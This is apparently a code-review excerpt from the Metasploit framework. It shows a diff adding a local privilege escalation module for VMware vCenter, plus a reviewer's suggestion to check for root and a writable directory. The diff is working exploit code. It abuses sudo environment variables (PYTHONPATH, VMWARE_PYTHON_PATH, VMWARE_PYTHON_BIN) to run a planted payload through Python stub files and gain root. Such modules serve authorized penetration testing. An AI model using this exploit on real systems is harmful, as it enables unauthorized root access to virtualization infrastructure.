modules/exploits/linux/local/vcenter_sudo_lpe.rb

```diff
@@ -0,0 +1,170 @@
+    # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution
+    vprint_status('Utilizing PYTHONPATH exploitation method for operator group.')
+    vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py'
+
+    return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/spwd.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_pod_user
+    # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
+    # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
+    vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.')
+    mkdir("#{base_dir}/appliance")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/appliance/__init__.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_admin_group
+    # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
+    # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
+    vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.')
+    mkdir("#{base_dir}/appliance")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/appliance/__init__.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit
```

Comment:
You already have the necessary includes to call `is_root?` and `writable?`
```suggestion
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end
```
It might also be worth to check if the user is root in the check method to avoid this potential log line:
```
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. User not vulnerable or not in correct group. (root:["root", "shellaccess"]) "set ForceExploit true" to override check result.
```